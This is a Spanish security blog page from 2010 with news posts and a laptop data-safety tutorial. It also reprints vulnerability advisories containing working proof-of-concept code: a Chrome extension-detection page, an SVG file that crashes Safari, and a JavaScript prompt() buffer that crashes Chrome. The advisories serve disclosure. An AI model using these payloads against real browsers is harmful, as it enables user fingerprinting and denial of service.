[Top Seguridad] Repaso a 2010

31 diciembre 2010 Publicado por cLimbo 2 comentarios
Este año 2010 que hoy termina ha sido un año intenso en cuanto a seguridad informática se refiere. Hemos sido testigos de ataques a la central nuclear de Irán, a WikiLeaks o a las webs de los partidos políticos en España; también ha sido el año de la creación del cibercomando estadounidense y de la celebración de las primeras cibermaniobras de la Unión Europea. Todo este movimiento a nivel global también tiene su reflejo a nivel de usuario, ya que durante este año hemos asistido a todo un festival de vulnerabilidades de Adobe o Windows y vivimos toda una psicosis por culpa de FireSheep.


Afortunadamente, cada vez es más habitual que los usuarios y las empresas se tomen en serio la seguridad de la información y tomen algunas precauciones a la hora de navegar por Internet o, simplemente, abrir archivos adjuntos en los correos electrónicos. Aún así, no hace mucho, pudimos ver un estudio que puso sobre la mesa que la cultura de la seguridad aún no está implantada en muchas empresas y que aún queda mucho por hacer en este sentido.

Bueno, pues despúes de todo lo que hemos visto durante este 2010, aquí van mis cinco aplicaciones más destacadas relativas a la seguridad en este 2010 que termina:

  • Con Firesheep, la verdad, es que lo pasamos bastante mal. Un complemento para Firefox, que nació de un experimento y con el que nos podían suplantar nuestras identidades en Twitter, Facebook o WordPress entre otros. Desde que nació Firesheep ningún congreso o evento en el que se ofrezca conexión wifi gratuita ha dejado de ser el mismo. ¿Y en qué se basaba?, pues que muchas redes sociales, para que la conexión fuese menos pesada, no usaban SSL, así que este complemento aprovechaba eso, analizaba el tráfico y almacenaba las sesiones, menuda gracia. ¿Y qué podemos hacer para evitarlo?, pues se lanzó un complemento para Firefox, BlackSheep, que era una especie contramedida, que funciona muy bien, y que envía información falsa a Firesheep para confundirlo, pero casi que la mejor solución es forzar el uso del SSL donde sea posible, por ejemplo, mediante las extensiones Force-TLS y HTTPS-Everywhere.

  • Panda Cloud es un antivirus que me gusta mucho, bueno, no sólo a mí, porque creo que hay bastante gente que está de acuerdo y piensa que este producto es una buena solución de seguridad. Apareció tímidamente a finales de 2009, pero este 2010 ha sido el de su despegue y extensión. Un antivirus que se basa en la nube, gratuito y con unos requisitos nada desmesurados.

  • Perder el ordenador portátil es una auténtica faena, ya sea porque te lo hayan robado o por un simple descuido. Para empezar, un estudio nos reveló que la mayoría de las empresas no cifraban la información de los discos duros de sus portátiles, dejando los datos a libre disposición de cualquiera que quisiera espiar (de hecho, también hace poco asistimos al bochornoso fallo de la NASA que vendió equipos informáticos con datos confidenciales que no habían sido borrados). Una aplicación interesante es Prey, una aplicación en software libre con la que podemos localizar nuestro portátil o nuestro smartphone en el caso que nos sea robado o que lo perdamos. La aplicación no está mal, a ver, funciona bajo el supuesto que el que nos roba el equipo lo arranque con el S.O. original que está instalado, para que Prey pueda informar sobre qué redes wifi hay alrededor, conectarse a alguna que esté abierta e informar de ello, pero bueno, no está mal porque si te toca un ladrón algo torpe que no conozca los live CD de las distribuciones Linux o que no sepa sacarle el disco duro al portátil, tendremos alguna posibilidad.

  • Hace poco menos de dos semanas Google presentó en sociedad su servicio de avisos sobre webs potencialmente inseguras. Aunque esto ya era algo que tenían, le han dado una vuelta al servicio y lo incluyen dentro de los resultados de las búsquedas, de manera que si una web ha sido alterada (víctima de un ataque, por ejemplo), Google nos alertará para que lo tengamos en cuenta antes de entrar al sitio web, además, si el webmaster de dicha web está registrado en Google (porque use las herramientas para webmasters), sería notificado por Google para que pudiese actuar sobre su sitio web tan rápido como sea posible.

  • Finalmente, una de mis aplicaciones favoritas de este 2010 es Square Privacy Cleaner, aplicación para borrar el rastro que dejas al usar un PC de uso público, ideal para llevar en una memoria USB y usar después de utilizar el PC de uso público que suele haber en los hoteles.

Estas son mis cinco aplicaciones destacadas de este 2010 sobre seguridad, seguramente me deje alguna en el tintero, así que la lista queda abierta a vuestras aportaciones.



Vía | Bitelia

El DDoS a la web del Congreso impide seguir en directo el debate sobre la Ley Sinde

21 diciembre 2010 Publicado por cLimbo 0 comentarios
Un presunto ataque masivo de denegación de servicio (DDoS) a la web del Congreso de los Diputados está imposibilitando el acceso a la emisión en directo del debate de la Comisión de Economía y Hacienda sobre la aprobación final de la Ley de Economía Sostenible. La ira de los internautas por el texto que prevé cerrar sitios web con enlaces parece ser la causa del ataque.

Desde primera hora de hoy martes 21 de diciembre resulta imposible acceder a la web del Congreso (www.congreso.es), en la que se puede seguir en directo la emisión del debate sobre la controvertida Ley Sinde. El presunto ataque no ha sido organizado aparentemente por parte de ninguna organización internauta, a diferencia de lo sucedido en los últimos ataques de denegación de servicio promovidos desde la Red. En el día de ayer se sucedieron los ataques contra las webs de los partidos políticos PSOE, CiU y PP.

Aunque se pueden entender los motivos de enfado y decepción entre aquellos que presuntamente han lanzado el ataque, el favor realizado al resto de la comunidad internauta ha sido más bien flaco al no poder seguir en directo y al completo la discusión. A primera hora también cayó la web de la Sociedad General de Autores y Editores (SGAE), según publicó Portaltic.es.

RTVE.es y Twitter, alternativas para seguir el debate

Ha tenido que ser Radio Televisión Española quien cuelgue la retransmisión en directo del debate sobre la norma, sobre la que se votará alrededor de las 14.00 horas. También cabe la posibilidad de seguir las posturas de cada partido a través de la red social de microblogging Twitter, donde las periodistas @MirenM, @toribiobea y @pilarportero están retransmitiéndolo.

En apenas unos minutos conoceremos el futuro que les espera a las web de enlaces en nuestro país, ya que las posturas de todos los partidos parece que no se decidirán hasta el último momento.



Vía | ADSLZone

Publicado algoritmo WPA de Movistar (Telefónica) y Jazztel

Publicado por cLimbo 0 comentarios

Atención, esto parece una soberana tontería pero hay que andarse con ojo. Según informa Seguridad Wireless, el algoritmo que genera las claves de seguridad WPA que Movistar y Jazztel utilizan por defecto en sus routers ha sido hecho público. Lo cual significa que nuestras redes WiFi hoy están bastante más inseguras que ayer.

El pasado 24 de Noviembre Seguridad Wireless, web dedicada a lo que dice su propio título, descifró este algoritmo de generación de claves WPA (las más usadas y recomendadas por las ISP). Tras intentar informar el problema a Comtrend (fabricante de los routers afectados, entre ellos el CT-5365 de Jazztel) y no recibir respuesta alguna por su parte, han decidido (no sé si muy acertadamente) liberar dicho algoritmo para que cualquiera pueda obtener dicha clave por defecto.

El algoritmo utiliza el nombre de la propia red WiFi, WLAN_XXXX en el caso de Movistar y JAZZTEL_XXXX en el caso de Jazztel, y la dirección MAC del router para obtener la clave WPA. Estos dos datos se encuentran a la vista de todos los que se encuentren en el radio de acción de nuestra WiFi, por lo que acceder a la misma y chupar de nuestra conexión sería coser y cantar. Además, el acceso a los dispositivos de nuestra red local estaría a su merced.

Afortunadamente la solución al problema es muy sencilla, cambiar la clave WPA por defecto por otra a nuestra elección (cuanto más larga y complicada mejor). Otras soluciones adicionales menores pasan por cambiar el nombre SSID a nuestra WiFi para camuflar que somos de Movistar o Jazztel (o mejor ocultarla), cambiar el usuario y password de acceso al router para que no cambien ninguno de los parámetros del mismo y añadir un filtrado por MAC para que sólo se conecten a nuestra red los dispositivos que nosotros autoricemos.

Por otra parte, tanto Comtrend como Movistar y Jazztel deberían revisar activamente sus políticas de seguridad para no quedar tan en evidencia ante una situación como esta. Algunos conocemos lo suficiente como para actuar ante una amenaza así, pero mucha gente, al contratar su ADSL, instala su router con la configuración por defecto y no sabe cómo modificarla.

Desde aquí os recomiendo que, si este es vuestro caso, os informéis siempre de las medidas que podéis tomar para proteger vuestra WiFi de accesos inesperados. Para ello podéis consultar la guía en que os explicamos todos los mecanismos de seguridad WiFi que podéis usar.



Vía | Syswoody

[Tutorial] Cómo mantener tus datos seguros en caso de robo o pérdida de tu equipo

13 diciembre 2010 Publicado por cLimbo 0 comentarios
En épocas donde las computadoras portátiles son cada día más populares y suele ser nuestro equipo principal, crece la preocupación de la seguridad de nuestros datos, especialmente en caso de robo o pérdida de nuestro equipo.


El hecho es que la mayoría de nosotros no nos preocupamos de hacer respaldos o configurar capas de seguridad para nuestros datos hasta que pasa “algo malo”. Después de eso es cuando tomamos cartas en el asunto, pero mientras tanto, ya perdimos datos. Al final, no es demasiado difícil, es sumamente barato y seguir estos pasos no toma demasiado tiempo.

Esta es una sencilla pero muy efectiva guía para mantener tus datos seguros en caso de robo o pérdida de tu equipo.

1. Siempre, activar la contraseña de acceso a tu máquina

De los argumentos más habituales que escucho para no tener activada la contraseña de acceso a un equipo es que este siempre está dentro de casa o es problemático recordarla o no tenemos tiempo de memorizar una que sea lo suficientemente larga para que se mantenga segura. Pero la realidad es en que siempre hay la posibilidad de que entren a tu casa y roben tus cosas, que pases por un control de seguridad en algún aeropuerto y quieran acceder a tus datos, que pierdas tu portátil en algún lugar y quien lo encuentre pueda ver todos tus documentos privados (fotos, emails, documentos, estados de cuenta) sin tu permiso.

Elegir una contraseña súmamente segura es muchísimo más fácil de lo que crees y no debería ser críptica, de 80 caracteres y sumamente difícil de recordar. Simplemente debes de seguir los siguientes consejos y es más que suficiente:

  1. No usar palabras de diccionario.
  2. No usar tu fecha de nacimiento.
  3. No usar una serie de números (12345 o 123 o 456)
  4. No usar “password”
  5. No usar tu nombre, el nombre de tu pareja, de tu mama o tu papá.

Es decir, mientras menos obvio, mejor. Pero insisto, no es necesario optar por una serie de caracteres al azar. Trata de mezclar números, letras, espacios y algún signo. En The usability of passwords lo explican al detalle pero aconsejaría algo como:

  1. Piensa en una palabra larga pero familiar, no necesariamente en tu idioma natal, pero que te sea extremadamente sencillo recordar. Para este ejemplo voy a usar una palabra en neerlandés, murcielago.
  2. Reemplazo la letra o por un 0 y la e por 3, la a por un 4 y la i por 1. El resultado: murc13l4g0.
  3. Hagamos la primera y la última letra mayúscula: Murc13l4g0.
  4. Finalmente agreguemos un par de espacios y dos símbolos: @ Murc13l4g0 &.

Tenemos así una contraseña de 14 caracteres extremadamente difícil de crackear, pero bastante fácil de recordar. Funciona bien con palabras compuestas o una frase que te sea familiar. Para no tener un punto único de fallo no uses la misma contraseña en más de un servicio, eso significaría que por X o Y motivo, si alguien logra saberla, puede acceder a todas tus cuentas.

2. Elige un buen sistema de respaldo

Las soluciones de respaldo de información en los últimos años se han hecho muy baratos y sobre todo muy sencillos de usar. El tema es que antes había que pasar horas configurando y asegurándonos que el software haga una copia correcta de nuestros archivos y que las haga a tiempo. En muchas ocasiones los sistemas de respaldo hacían nuestros equipos lentos o empezaban el proceso a horas no recomendadas.

Por otro lado estaba el tema del costo de hardware para mantener un respaldo redundante que no se perdiera en el segundo que el almacenamiento en cuestión fallara. La realidad es que tener un solo disco duro externo (de esos que cuestan 100 dólares por 1TB) conectado al equipo para que se haga el respaldo automático cada noche simplemente no es suficiente. Son baratos, y suelen fallar bsastante. Se necesita más.

¿La gran solución? Un flujo de respaldo redundante que implique tener tu información en tres lugares (suena complicado, pero no lo es):

  1. En el disco duro de tu equipo.
  2. En un sistema de respaldo automático de hardware que tengas en casa u oficina.
  3. En un sistema de respaldo automático en la nube.

¿Por qué la redundancia? Si pierdes la información en el disco duro de tu portátil puedes recuperarla en pocas horas rescatándolo del hardware que tengas onsite en casa u oficina. Si se incendia tu lugar de trabajo o tu hogar, tienes un respaldo de toda tu información offsite, en la nube. Tardarás más en descargarla toda, pero siempre estuvo segura. Por último, si mañana te quedas para siempre sin internet o el servicio de respaldo online desaparece de la nada, tendrás siempre tanto el respaldo de hardware en casa/oficina.

Para el sistema de respaldo en casa recomiendo:

  1. La solución más cara: un Drobo que permite hacer muy fácilmente un RAID de 3, 4 o 5 discos duros. Que no tienen que ser de la mejor calidad pues hay redundancia de discos.
  2. Time Capsule, es una solución de costo medio, es sumamente sencillo de configurar (de hecho no hay que configurar nada) pero funciona solo en Mac. El disco duro interno es de una calidad bastante buena. En caso que no te sientas seguro con un solo disco duro es posible conectar un segundo disco duro externo vía USB y transferir la información de un lugar a otro.
  3. Crashplan: Una interesante solución para hacer respaldo de archivos tanto offline como online en Mac, PC y Linux. Se puede usar discos externos.

Insisto en evitar comprar la versión más barata del disco LaCie de 500GB o T1B que suelen costar por lo general 100 dólares o euros. Es bastante atractivo el precio pero la calidad del disco duro que hay dentro es un tanto cuestionable.

Para sistemas de respaldo online:

  1. Dropbox: La sincronización es automática y constante, tengo todos mis documentos y archivos de trabajo ahí. Puedo accederlos desde cualquier lugar vía web, tambien en mi iPhone o en mi Android. Hay una versión gratuita que debería funcionar para la gran mayoría pero también hay versiones de pago con mucha más capacidad. Además Dropbox guarda versiones de cada uno de los archivos que tienes (durante un mes), por lo tanto, puedes revertir cambios o recuperar documentos eliminados.
  2. SugarSync: La competencia directa de Dropbox, comparte muchísimas características. Su mayor ventaja es que se puede sincronizar cualquier carpeta del sistema. La desventaja es que las velocidades de sincronización y transferencia no son tan rápidas y las opciones para compartir carpetas no suelen ser tan fáciles/intuitivas/usables como Dropbox.
  3. Backupify: Funciona puramente como un sistema de respaldo de archivos. Se configura la frecuencia y las carpetas a respaldar.
  4. Google Docs: Aunque no necesariamente sirve para respaldar es siempre buena idea tener una copia de tus documentos en este sistema gratuito o simplemente trabajar desde ahí. Hay herramientas que te permiten subir todos los documentos de tu equipo a la nube.

Una vez que hayas elegido y después configurado tanto el sistema onsite como el sistema offsite, no debes hacer absolutamente nada más. Tus datos están en tres lados distintos y la tranquilidad que eso te ofrece es impagable.

Mi preferencia personal es una combinación de Time Capsule + Dropbox. Pero cada persona tendrá sus propias preferencias.

3. Localiza tu equipo si este fue robado

Nos puede llegar a pasar a todos, el equipo ya fue robado. Pero no todo está perdido. De la misma forma en que los iPhones o los Androids tienen sistemas de localización del equipo o la opción de eliminar absolutamente todos los datos de forma remota en caso extremo, es posible instalar software similar a nuestros portátiles.

El software en cuestión se llama Prey, es un excelente producto chileno que funciona de manera gratuita salvo que tengas más de ¿5? equipos. Es necesario crear una cuenta y registrar tu portátil (descargando e instalando la aplicación). Después de eso te olvidas que existe (salvo que te roben la máquina).

En caso que suceda, accedes a un panel de control vía web donde puedes activar la vigilancia y saber el IP con el cual se han conectado a internet, activar la webcam (en caso que la tenga) y tomar fotos a quien te la robó y eliminar toda información en última instancia.

Con estos tres pasos sentirás seguridad absoluta, no solo de poder recuperar tu información sino de que esta no será accedida y que tal vez inclusive puedas recuperar tu portátil en caso de que lo roben.



Vía | ALT1040

Hotmail implementa seguridad SSL para toda la sesión

07 noviembre 2010 Publicado por cLimbo 0 comentarios

Hotmail, ha implementado el uso del protocolo seguro SSL, que ahora podrá estar activo durante toda la sesión en que usemos Hotmail (y Windows Live en general), y no solo durante el momento de ingresar correo y contraseña, que es lo que ocurría antes.

Para poder hacer uso de esta seguridad mejorada simplemente tenemos que ir a https://www.hotmail.com (recordando poner una “s” después del “http”). Una vez ahí se nos preguntará si queremos usar la seguridad SSL sólo esta vez, o siempre. Si elegimos esta última opción, se nos redirgirá a al sitio HTTPS cada vez que iniciemos sesión en Hotmail, Calendario o Contactos. Eso sí, se nos advierte que de elegir que el SSL para toda la sesión se active automáticamente, tendremos problemas usando Hotmail con clientes de correo, como Outlook Connector, Windows Live Mail, o los clientes de Nokia y Windows Mobile.

En resumen, si solemos acceder a Hotmail a través de clientes o smartphones, no nos conviene elegir que la seguridad SSL se active automáticamente, sino que sólo dejarla para cuando ingresemos a Hotmail vía web, usando un ordenador público (basta con escribir “https” en vez de “http” al principio de la dirección). En cambio, si no usamos clientes, es recomendable pedir que el SSL esté siempre activado, para así evitar que se nos olvide acceder vía HTTPS.

Enlace | Opciones de SSL en Hotmail




Vía | Genbeta

Intypedia, la enciclopedia de la seguridad

30 septiembre 2010 Publicado por cLimbo 0 comentarios
Ayer se presentó el proyecto Intypedia, “La Enciclopedia de la Seguridad de la Información”, una iniciativa de Aula Virtual dentro de la Red Temática de Criptografía y Seguridad de la Información CRIPTORED (formada por 219 universidades de todo el mundo y 300 empresas de sector TIC y la seguridad de más de 20 países) con el apoyo económico de GMV y el impulso de la Universidad Politécnica de Madrid (UPM). Este nuevo proyecto de CRIPTORED tiene como objetivo el convertirse en el Aula Virtual y sala de estudio en Internet de miles de estudiantes, profesionales e internautas en general, interesados por los temas de la seguridad de la información.


Bajo el paraguas de este proyecto, se producirán vídeos de corte formativo sobre seguridad de la informaciónu que serán accesibles de el canal de YouTube de la UPM y desde la propia plataforma Intypedia, por lo que todo el material generado será accesible de manera gratuita. Las lecciones en video, presentadas por dos personajes virtuales, Alicia y Bernardo, darán un repaso a los temas más importantes de la seguridad de la información, usando como base textos y lecciones aportadas por distinguidos expertos, miembros de la Red Temática. Cada lección en vídeo se acompaña de diversos documentos: el guión del vídeo, una presentación con diapositivas relativas a la teoría expuesta en el vídeo y un boletín de ejercicios, para afianzar conocimientos; de hecho, la primera de las lecciones está ya disponible para su visuaización y descarga (la historia de la criptografía, muy recomendable).

Me parece, la verdad, una iniciativa muy interesante, porque, aunque imprescindible, no existe mucho material de consulta gratuita en la red relativo a seguridad de la información; a pesar de su importancia, es un tema poco tratado. Este tipo de iniciativas, sin ser un máster en seguridad, cumplen una función muy importante: la concienciación de los usuarios. Es más, parece que empieza a haber cierto movimiento, agitación más bien, alrededor de la seguridad y su importancia, por ejemplo, en entornos corporativos. Igual que usamos el concepto de “cultura de empresa”, tendríamos que adoptar uno similar en los entornos corporativos, una “cultura de seguridad” en la que concentremos buenas prácticas, procedimientos y medidas a tomar para salvaguardar la información.

La verdad es que esta concienciación por la seguridad es muy interesante, de hecho, para muchas empresas es toda una oportunidad. La seguridad de la información no es un tema que llevan “unos cuantos locos” que sólo piensan en instalar firewalls, es un compromiso, no sólo de la dirección si no que de toda la empresa. Es interesante cómo desde las propias administraciones se empieza a fomentar entre los usuarios la cultura de la seguirdad de la información. Me alegra mucho poder estar informado a través de iniciativas como INTECO-CERT o del joven AndaluciaCERT, centros de respuesta a incidentes de seguridad impulsados por la administración, el primero con orientación a toda la ciudadanía y el segundo, orientado a la propia administración andaluza.

La concienciación sobre la importancia de la seguridad y el establecimiento de una serie de buenas prácticas son algo fundamental y casi prioritario en cualquier empresa. Es uno de los pilares que soportarán la continuidad de nuestro negocio, por tanto, una buena formación de los usuarios será fundamental.



Vía | Bitelia

12 aniversario de Google

27 septiembre 2010 Publicado por cLimbo 0 comentarios
Con este logo tan particular nos saluda hoy el portal de búsquedas de Google, ¿la razón? La celebración del duodécimo aniversario desde su creación. El dibujo que hace de doodle de hoy es obra del artista norteamericano Wayne Thiebaud y lo podemos encontrar tanto en la página internacional como en las locales de todo el mundo.

De modo que fue tal día como hoy hace 12 años que se fundó la empresa del buscador más famosa del mundo… bueno, no exactamente. Si hacemos la consulta en la Wikipedia, encontraremos una fecha diferente, el 4 de septiembre, como día en que Larry Page y Sergey Brin registraron la empresa. Lo que sucede es que la empresa decidió cambiar de fecha en varias ocasiones este aniversario, hasta que en 2005 fue fijado definitivamente el día 27 de septiembre.

Lo verdaderamente significativo en toda esta noticia es que en tan sólo 12 años Google ha pasado de ser una empresa pequeña, una startup a la sombra de otros motores de búsqueda como Altavista, a ser el rey indiscutible de este sector tan lucrativo de la red. No conforme con eso, los de Mountain View han sabido diversificar sus líneas de negocio abarcando otros muchos sector complementarios como Google Maps, Google Docs, Android, Chrome, etc. De modo que es capaz de ofrecer una respuesta completa a muchas de las necesidades tecnológicas del usuario actual.

Desde Bitelia, y personalmente un servidor que escribe estas líneas y que hace de editor de asuntos Google en este blog, no podemos menos que dar la enhorabuena a la empresa esperando que sigan alegrando el panorama digital actual, que gracias a sus muchos colores es mucho más divertido de lo que lo era antes.




Vía | Bitelia

Google Chrome Instaled extensions arbitrary detection

15 septiembre 2010 Publicado por cLimbo 0 comentarios
######################################################
Google Chrome Instaled extensions arbitrary detection
URL afectada: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Notificación al afectado: Sí Confirmación del afectado: Sí Exploit: Sí
######################################################

Cambio de registro: http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Resumen
#########

¿Cuánta seguridad tiene usar extensiones?

Un atacante puede acceder a través de un iframe a las extensiones de recursos (cabe destacar que en este momento no han encontrado una forma de información alterada de las prórrogas).


>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<

(por ejemplo)

un usuario remoto puede modificar este documento web y llamándolo conel tag meta "base" en un formato incorrecto del doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">


Por lo que llego a la conclusión de que las extensiones chrome necesitan mejorarse y evitar el acceso no interno de recursos de las páginas web externas .. (optativas de usar file:/// y otros controladores de otros protocolos son también seguros de usar y no dan acceso a los recursos internos contra las señales externas de documentos web ...)

Así el controlador de chrome-extension puede ser utilizado para obtener extensiones instaladas en el navegador del cliente ... y con posiblidad de ver ellos si cualquier extensión es vulnerable a algo, puesto que esta información puede ser utilizada para explotar esta extensión ...

En las extensiones en modo incógnito puede ser fácil de detectar.


###########################
Ejemplo de PoC
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Descubierto
##############

Descubierto:27 may 2010
Notificado:01 jun 2010
Parcheado:02 sep 2010
Publicado: 07 sep 2010

#######################€ND ########################

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
-----

thz Lost ;-)

Safari for windows Invalid SGV text style Webkit.dll DoS

02 septiembre 2010 Publicado por cLimbo 0 comentarios
###################################################
Safari for windows Invalid SGV text style Webkit.dll DoS
Afectado: www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como "image.svg" y ábrelo con Safari, mirad como se añaden algunos píxeles "extra" en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1">
<defs>
<mask id="crash">
<polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935"
transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)"
style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" />
</mask>
</defs>

<g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;">
<text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text>
<text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text>
<text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
---
thz Lost ;-)

Google Chrome and Chrome frame Prompt DoS

16 agosto 2010 Publicado por cLimbo 0 comentarios
###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de "mensajes de alerta" cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.


###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongluencia en todos los sistemas :)


######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)


##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
"window manager button" and we can´t no change beetwen applications
that we have open.


##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)


####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################


<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>


################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
prompt(buffer);
}
setTimeout('DoS()',1000);
</script>

################# EOF ###################


############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
------------

thz Lost ;-)

Singularity; un OS hecho con C#

12 agosto 2010 Publicado por cLimbo 0 comentarios
Hace unas horas fue anunciada la liberación de la versión 2.0 de Singularity RDK (Research Development Kit). Esto a través de código fuente y un archivo ISO arrancable. Ahora bien, ¿qué es Singularity? Es un prototipo de sistema operativo iniciado en 2003 por un equipo de investigación en Microsoft Research.



(click para agrandar)

Los investigadores detrás de Singularity buscan explorar, reexaminar y mejorar la calidad de la decisiones de diseño en la construcción de nuevos sistemas operativos. Puesto que estos están ubicados al fondo de casi cualquier pila de software, sus efectos son profundos.

Alrededor de Singularity también se están creando extensiones a lenguajes de programación, y desarrollando nuevas técnicas y herramientas para especificar y verificar de manera formal la conducta de los programas.

De forma arquitectónica, Singularity tiene tres características:

  1. Procesos aislados para la protección de programas y servicios del sistema.

  2. Canales de comunicación basados en contratos —especificaciones bien precisas—.

  3. Programas basados en manifiestos para la verificación de las propiedades del sistema.

De forma sorprendente, el núcleo de Singularity ha sido programado con éxito usando el lenguaje C#. En particular con el extraño lenguaje #Sing. Naturalmente, las demás partes del sistema fueron escritas en ensamblador, C/C++. Es importante reiterar que se trata de un prototipo, no de un sistema operativo completo que puedas instalar y usar de forma normal en tu equipo de cómputo.

Puedes conocer los detalles de diseño en alguno de los interesantes artículos de investigación que ha publicado el grupo encargado de Singularity. Por cierto, este sistema operativo es software de código abierto —esto es debatible— gobernado por la licencia no comercial sólo para uso académico —E. Park explica muy bien sus restricciones.




Vía | Bitelia

Safari for windows Long link DoS

